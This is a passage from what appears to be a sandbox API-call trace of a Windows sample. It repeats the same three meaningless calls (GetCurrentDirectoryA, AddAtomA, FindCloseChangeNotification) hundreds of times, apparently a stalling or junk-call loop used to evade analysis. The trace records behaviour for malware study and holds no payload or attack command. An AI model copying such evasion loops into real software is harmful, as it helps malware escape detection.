[0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.820] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.821] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.822] AddAtomA (lpString=0x0) returned 0x0 [0044.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.823] AddAtomA (lpString=0x0) returned 0x0 [0044.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.824] AddAtomA (lpString=0x0) returned 0x0 [0044.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.825] AddAtomA (lpString=0x0) returned 0x0 [0044.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.825] AddAtomA (lpString=0x0) returned 0x0 [0044.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.825] AddAtomA (lpString=0x0) returned 0x0 [0044.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.825] AddAtomA (lpString=0x0) returned 0x0 [0044.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.825] AddAtomA (lpString=0x0) returned 0x0 [0044.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.825] AddAtomA (lpString=0x0) returned 0x0 [0044.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.825] AddAtomA (lpString=0x0) returned 0x0 [0044.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.825] AddAtomA (lpString=0x0) returned 0x0 [0044.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.825] AddAtomA (lpString=0x0) returned 0x0 [0044.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.826] AddAtomA (lpString=0x0) returned 0x0 [0044.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.827] AddAtomA (lpString=0x0) returned 0x0 [0044.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.828] AddAtomA (lpString=0x0) returned 0x0 [0044.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification 